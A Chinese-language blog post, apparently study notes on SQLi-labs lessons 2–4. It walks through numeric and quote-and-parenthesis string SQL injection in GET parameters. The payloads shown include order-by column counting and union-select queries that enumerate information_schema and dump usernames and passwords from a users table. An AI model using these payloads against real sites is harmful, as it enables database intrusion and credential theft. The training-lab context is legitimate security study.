标签:format 数据库名 tab line 显示 database and lin word
Less2
GET_数字型注入
?id=1
to use near ‘\ LIMIT 0,1‘ at line 1
\ LIMIT 0,1
只有一个\,没有单双引号,说明为数字型
后台查询语句
select username from users where id=1 limit 0,1
?id=1 order by 4 --+
报错,有3列
?id=-1 union select 1,database(),user() --+
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users" --+
?id=-1 union select 1,2,group_concat(username,password) from users --+
Less-3
GET_单引号_小括号_字符型注入
?id=1‘
use near ‘‘1‘‘) LIMIT 0,1‘ at line 1
‘1‘‘) LIMIT 0,1
单引号,单括号
?id=1‘) order by 4 --+
Less-4
GET_双引号_单括号_字符型注入
?id=1"
to use near ‘"1"") LIMIT 0,1‘ at line 1
"1"") LIMIT 0,1
双引号,单括号
?id=1") --+
标签:format 数据库名 tab line 显示 database and lin word
原文地址:https://www.cnblogs.com/observering/p/12902465.html